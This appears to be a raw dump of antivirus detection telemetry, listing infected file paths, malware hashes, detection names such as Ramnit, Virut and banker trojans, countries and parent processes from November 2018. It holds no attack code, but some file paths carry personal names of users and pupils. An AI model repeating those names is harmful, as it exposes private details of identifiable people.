  Row(detection=Row(filename='avscan-20181101-012039-1780034d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8ee50773\\AVSCAN-20181101-011928-0E61CA2D\\AVSCAN-20181101-012039-1780034D', filesize=4800000, name='TR/Spy.Banker.Gen.#M1.#R1'), hash='6a10f4e287d21dd6ef83dd4c4fe2a109922634b96f93274f2c2bdbcbd68ebea7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T03:22:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-012113-1bc6d4fb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8ee50773\\AVSCAN-20181101-011928-0E61CA2D\\AVSCAN-20181101-012113-1BC6D4FB', filesize=4800000, name='TR/Spy.Banker.Gen.#M1.#R1'), hash='6a10f4e287d21dd6ef83dd4c4fe2a109922634b96f93274f2c2bdbcbd68ebea7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T03:22:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-012105-1ac1595c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8ee50773\\AVSCAN-20181101-011928-0E61CA2D\\AVSCAN-20181101-012105-1AC1595C', filesize=4800000, name='TR/Spy.Banker.Gen.#M1.#R1'), hash='6a10f4e287d21dd6ef83dd4c4fe2a109922634b96f93274f2c2bdbcbd68ebea7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T03:22:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-012055-1984c897', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8ee50773\\AVSCAN-20181101-011928-0E61CA2D\\AVSCAN-20181101-012055-1984C897', filesize=4800000, name='TR/Spy.Banker.Gen.#M1.#R1'), hash='6a10f4e287d21dd6ef83dd4c4fe2a109922634b96f93274f2c2bdbcbd68ebea7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T03:22:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-012047-188280f1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8ee50773\\AVSCAN-20181101-011928-0E61CA2D\\AVSCAN-20181101-012047-188280F1', filesize=4800000, name='TR/Spy.Banker.Gen.#M1.#R1'), hash='6a10f4e287d21dd6ef83dd4c4fe2a109922634b96f93274f2c2bdbcbd68ebea7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T03:22:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-012121-1cc2e3e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8ee50773\\AVSCAN-20181101-011928-0E61CA2D\\AVSCAN-20181101-012121-1CC2E3E6', filesize=4800000, name='TR/Spy.Banker.Gen.#M1.#R1'), hash='6a10f4e287d21dd6ef83dd4c4fe2a109922634b96f93274f2c2bdbcbd68ebea7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T03:23:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-012017-14aef1fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8ee50773\\AVSCAN-20181101-011928-0E61CA2D\\AVSCAN-20181101-012017-14AEF1FD', filesize=4800000, name='TR/Spy.Banker.Gen.#M1.#R1'), hash='6a10f4e287d21dd6ef83dd4c4fe2a109922634b96f93274f2c2bdbcbd68ebea7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T03:22:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-012032-167fc04d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8ee50773\\AVSCAN-20181101-011928-0E61CA2D\\AVSCAN-20181101-012032-167FC04D', filesize=4800000, name='TR/Spy.Banker.Gen.#M1.#R1'), hash='6a10f4e287d21dd6ef83dd4c4fe2a109922634b96f93274f2c2bdbcbd68ebea7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T03:22:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=19452000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='6a46ea1d7f1da34104b809c6cab68409fde9e42efd5e836e170f207812ddd47e', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T11:15:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a95108756485e864c49f77361dac79d4.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\a95108756485e864c49f77361dac79d4.exe', filesize=64000, name='TR/Dropper.Gen.#M300.#R3643'), hash='6a4c8cbc73292ea252ba6e1045c1cc15476ad137fbbd0ee99de25bc8cb7a3ce8', metadata=Row(cmdline=None, country='SK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:42:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='windowsformsapplication3.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsFormsApplication3.exe', filesize=64000, name='TR/Dropper.Gen.#M300.#R3643'), hash='6a4c8cbc73292ea252ba6e1045c1cc15476ad137fbbd0ee99de25bc8cb7a3ce8', metadata=Row(cmdline=None, country='SK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:42:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='alaskan.vir', filepath='\\\\?\\C:\\Program Files\\Flipper\\alaskan.VIR', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='6aac33cc09101d1bfa9529c891b30cbb094736de5348a15f1b3031f2c7e026c1', metadata=Row(cmdline=None, country='ZA', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:27:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-081733-a00de257', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d15830c6\\AVSCAN-20181101-081149-80057893\\AVSCAN-20181101-081733-A00DE257', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='6aebd1d925b21a9928f8c876c1b660c171ffac9f1875be9e26d8c786cbe688dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:17:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-082112-b470c72c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d15830c6\\AVSCAN-20181101-081149-80057893\\AVSCAN-20181101-082112-B470C72C', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='6aebd1d925b21a9928f8c876c1b660c171ffac9f1875be9e26d8c786cbe688dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:21:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='downloader-fuer-pazera_free_mov_to_avi_converter.exe', filepath='F:\\Netbook\\LW_C\\Dokumente und Einstellungen\\Walter Schmitz\\Eigene Dateien\\Downloader-fuer-Pazera_Free_MOV_to_AVI_Converter.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='6aebd1d925b21a9928f8c876c1b660c171ffac9f1875be9e26d8c786cbe688dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\totalcmd_912\\TOTALCMD64.EXE', parentsize=8870024, timestamp='2018-11-01T01:22:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='downloader-fuer-pazera_free_mov_to_avi_converter.exe', filepath='F:\\Netbook\\LW_C\\Dokumente und Einstellungen\\Walter Schmitz\\Eigene Dateien\\Downloader-fuer-Pazera_Free_MOV_to_AVI_Converter.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='6aebd1d925b21a9928f8c876c1b660c171ffac9f1875be9e26d8c786cbe688dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\totalcmd_912\\TOTALCMD64.EXE', parentsize=8870024, timestamp='2018-11-01T01:22:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avdula_ahmad.doc', filepath='C:\\Users\\X\\Documents\\5.1 6.1 7.1 8.1\\Deckblätter_6_1_2HJ_16_17\\Avdula_Ahmad.doc', filesize=64000, name='HEUR/Macro.Downloader.AMCY.Gen.#M1.#R1'), hash='6b1d58b6b0eee00fcb53ff8618f245a6faf1f0a0a62765b632ff3ced53578544', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe23_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe23 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T16:24:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-172706-d9ad476b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_357a596a\\AVSCAN-20181101-172500-D01F2DF7\\AVSCAN-20181101-172706-D9AD476B', filesize=64000, name='HEUR/Macro.Downloader.AMCY.Gen.#M1.#R1'), hash='6b1d58b6b0eee00fcb53ff8618f245a6faf1f0a0a62765b632ff3ced53578544', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:27:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='need for speed the run.exe', filepath='C:\\Program Files (x86)\\Need For Speed The Run\\Need For Speed The Run.exe', filesize=7808000, name='W32/Virut.Gen.#M1.#R1'), hash='6b29dfb7c7c4dfe2919e997510c9d39000b5c56ec90113d7067ffecba1619c65', metadata=Row(cmdline=None, country='ZA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T17:37:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ifversion.dll', filepath='C:\\Program Files (x86)\\AspenTech\\Aspen HYSYS V7.1\\IFVersion.dll', filesize=192000, name='W32/Ramnit.CD.#M1.#R1'), hash='6b41dc28bde442c5d161a7ddab28ca8f2b6fb75c507020de2926662ec11a21f1', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T22:37:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ifversion.dll', filepath='C:\\Program Files (x86)\\AspenTech\\Aspen HYSYS V7.1\\IFVersion.dll', filesize=192000, name='W32/Ramnit.CD.#M1.#R1'), hash='6b41dc28bde442c5d161a7ddab28ca8f2b6fb75c507020de2926662ec11a21f1', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T23:38:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ifversion.dll', filepath='C:\\Program Files (x86)\\AspenTech\\Aspen HYSYS V7.1\\IFVersion.dll', filesize=192000, name='W32/Ramnit.CD.#M1.#R1'), hash='6b41dc28bde442c5d161a7ddab28ca8f2b6fb75c507020de2926662ec11a21f1', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T21:19:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gtomb .exe', filepath='\\?\\J:\\العاب\\TOMB\\gTOMB .exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='6b540631a5ae50611b1ecf9252f1947ee9f8a510c200c3b6dbdf98ffe9e18691', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:05:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='6b937ff378a8e871cc9ff12d5a7079b3ffc4e41234bac993f88fe6b49fbc37f1', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2501368, timestamp='2018-11-01T09:51:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-115156-7999a917', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d8a30e46\\AVSCAN-20181101-115134-769BF0B2\\AVSCAN-20181101-115156-7999A917', filesize=1536000, name='PUA/AD.BitcoinMiner.B.#M1.#R1'), hash='6b937ff378a8e871cc9ff12d5a7079b3ffc4e41234bac993f88fe6b49fbc37f1', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T09:51:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110231-33d846f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_68ba5657\\AVSCAN-20181101-110204-2F20D71F\\AVSCAN-20181101-110231-33D846F5', filesize=1536000, name='PUA/AD.BitcoinMiner.B.#M1.#R1'), hash='6b937ff378a8e871cc9ff12d5a7079b3ffc4e41234bac993f88fe6b49fbc37f1', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:02:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='6b937ff378a8e871cc9ff12d5a7079b3ffc4e41234bac993f88fe6b49fbc37f1', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T03:01:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='regfix.exe', filepath='\\\\?\\G:\\Game_Coll\\السمكة الجديدة\\REGFIX.EXE', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='6bfcf33539ad802110a3039a51dfa9651f63b0345c56694417737c2bc22cdaef', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:28:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rebuilt.soap.exe', filepath='\\\\?\\C:\\Users\\X\\Desktop\\القرآن الكريم -عبدالله خياط\\RECYCLE\\علي المبارك\\جداول الوثائق\\rebuilt.soap.exe', filesize=2688000, name='W32/Small.L.#M1.#R1'), hash='6c1c566b7145fc6047852c2987ba3df5d04823bd59e2c90701cc43abce2a48da', metadata=Row(cmdline=None, country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:26:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0008308.exe', filepath='E:\\System Volume Information\\_restore{75C7AE52-D1AC-46D0-8315-28C9EF83A0B2}\\RP8\\A0008308.exe', filesize=192000, name='HEUR/APC.#M1.#R1'), hash='6c965e11d644c1387b55706257b4bf8359601324a56681f7e0fa61b91e5f5cf7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:52:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered sirif', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered sirif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='6d0956becde79707bc2822ca4e6de56fc8b1228145d7ba62c2dfaea6064628ed', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:48:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dsp3.exe', filepath='F:\\大戰略 PERFECT 3.0\\DSP3.EXE', filesize=2048000, name='W32/Almanahe.C.#M1.#R1'), hash='6d72a116be57c06d272d643fa65661a8173d7c515d29436351b7a9b331c722ed', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:MiIC1l\\\\\\/jbEyNM8o0.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T20:34:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dsp3.exe', filepath='F:\\大戰略 PERFECT 3.0\\DSP3.EXE', filesize=2048000, name='W32/Almanahe.C.#M1.#R1'), hash='6d72a116be57c06d272d643fa65661a8173d7c515d29436351b7a9b331c722ed', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:MiIC1l\\\\\\/jbEyNM8o0.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T20:34:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dsp3.exe', filepath='F:\\大戰略 PERFECT 3.0\\DSP3.EXE', filesize=2048000, name='W32/Almanahe.C.#M1.#R1'), hash='6d72a116be57c06d272d643fa65661a8173d7c515d29436351b7a9b331c722ed', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:MiIC1l\\\\\\/jbEyNM8o0.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T20:34:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tv.exe', filepath='C:\\Progs5\\Aldist\\TV.exe', filesize=4928000, name='TR/Agent.ugljo.#M1.#R1'), hash='6d7b13673e4f0f9804f2f521f9070816d5cccc266b8dc427137433935cfe2f27', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Progs5\\Aldist\\estoque.exe', parentsize=37241344, timestamp='2018-11-01T12:42:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-121849-107d052f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d45ade37\\AVSCAN-20181101-121832-0DE31D88\\AVSCAN-20181101-121849-107D052F', filesize=4928000, name='TR/Agent.ugljo.#M1.#R1'), hash='6d7b13673e4f0f9804f2f521f9070816d5cccc266b8dc427137433935cfe2f27', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:18:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tv (1).exe', filepath='C:\\Users\\X\\Desktop\\TV (1).exe', filesize=4928000, name='TR/Agent.ugljo.#M1.#R1'), hash='6d7b13673e4f0f9804f2f521f9070816d5cccc266b8dc427137433935cfe2f27', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4848952, timestamp='2018-11-01T15:18:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094309-8e41de11', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d45ade37\\AVSCAN-20181101-094239-89A6D73E\\AVSCAN-20181101-094309-8E41DE11', filesize=4928000, name='TR/Agent.ugljo.#M1.#R1'), hash='6d7b13673e4f0f9804f2f521f9070816d5cccc266b8dc427137433935cfe2f27', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:43:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tv.exe', filepath='C:\\Progs5\\Aldist\\TV.exe', filesize=4928000, name='TR/Agent.ugljo.#M1.#R1'), hash='6d7b13673e4f0f9804f2f521f9070816d5cccc266b8dc427137433935cfe2f27', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Progs5\\Aldist\\estoque.exe', parentsize=37468160, timestamp='2018-11-01T16:59:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adventureinlay.exe', filepath='\\?\\J:\\العاب2\\جميع انواع الزوما\\زوما\\AdventureInlay.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='6d8f0d34b4aba333425dfaba2073b27cc86dd4241efd4ac5cc7c9146dfab3f7f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:12:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-084332-750e1b9c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e3c83d58\\AVSCAN-20181101-084317-726FAA45\\AVSCAN-20181101-084332-750E1B9C', filesize=1088000, name='X2000M/Agent.91364890.#M1.#R1'), hash='6d9769b7e80e04ca43279bcc8ca0d62cf3eb229fb623837eaef03a7fd2fccfcc', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:43:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='07-aircraft transit sub juli  2018.xls', filepath='\\\\192.168.1.88\\Users\\user\\Documents\\AIRCRAFT TRANSIT sta Sub 2018\\07-AIRCRAFT TRANSIT SUB JULI  2018.xls', filesize=1088000, name='X2000M/Agent.91364890.#M1.#R1'), hash='6d9769b7e80e04ca43279bcc8ca0d62cf3eb229fb623837eaef03a7fd2fccfcc', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T01:42:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wmlaunch.exe', filepath='\\\\?\\C:\\Program Files\\Windows Media Player\\wmlaunch.exe', filesize=256000, name='TR/Patched.Gen.#M300.#R2947'), hash='6e15f79931eef690b1e1dee229219c28f8e56310714f9b6bd56a6261ca52ea21', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:21:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-235756-404111ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_84010185\\AVSCAN-20181101-235651-3719DF95\\AVSCAN-20181101-235756-404111AC', filesize=1544000, name='PUA/InstallCore.Gen2.#M1.#R1'), hash='6e1d6a7d3eafeb79153563f2bafd04e686bbd578a0a1548d4b1a5a45276d1525', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T22:57:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='winzip20-new.exe', filepath='C:\\Users\\X\\Downloads\\winzip20-new.exe', filesize=1544000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='6e1d6a7d3eafeb79153563f2bafd04e686bbd578a0a1548d4b1a5a45276d1525', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T22:56:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='caption.htm', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\Photoshop 7.0\\Presets\\WebContactSheet\\Horizontal Light\\Caption.htm', filesize=216000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='6e2417ab0ccf910099220898fc5a92f4333b47b10c344eca9e3d2006608a58e3', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T12:57:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rome2.dll', filepath='C:\\Users\\X\\Desktop\\Total War Rome II Emperor Edition\\Rome2.dll', filesize=26752000, name='W32/Ramnit.CD.#M1.#R1'), hash='6e3e48dfcf4df4d9d268e8d8efb719f659d28431a00e22447bf0b51bcefbd8af', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=815304, timestamp='2018-11-01T15:04:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wsbaf9cd7d26a2eabf53ab041041081290f-7fc9.html', filepath='\\\\?\\C:\\Program Files\\Common Files\\Adobe\\Help\\en_US\\PremierePro\\3.0\\WSbaf9cd7d26a2eabf53ab041041081290f-7fc9.html', filesize=8000, name='W32/Chir.B.#M1.#R1'), hash='6e8f428013e3ef2e52e2c4f68898090ec3c2e9140192469c311297135669b00f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:13:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{3EBF898E-6BAB-4161-B420-37443DC0569C}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='6ebbbdca14d6cba5f9e4fd4285f89e761d9b468aa87c8756f541a0f1129b1420', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T00:59:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='s0017mdfl.dll', filepath='C:\\Program Files\\Gsm Box Cracked Full Pack By TCS\\AutoPlay\\Docs\\TM Miracle Falcon Box\\Bin\\s0017mdfl.dll', filesize=4992000, name='DR/Delphi.Gen.#M300.#R491'), hash='6effd6351227497ea1e1d697792f0b7050faf5fc051144d52122171fc9a84a0e', metadata=Row(cmdline='aeinv.dll,UpdateSoftwareInventory', country='MY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=49664, timestamp='2018-11-01T17:56:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-020219-71d55b11', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cb0bc277\\AVSCAN-20181102-020151-6D7B4572\\AVSCAN-20181102-020219-71D55B11', filesize=4992000, name='DR/Delphi.Gen.#M1.#R1'), hash='6effd6351227497ea1e1d697792f0b7050faf5fc051144d52122171fc9a84a0e', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:02:40Z'), dt=datetime.date(2018, 11, 1)),
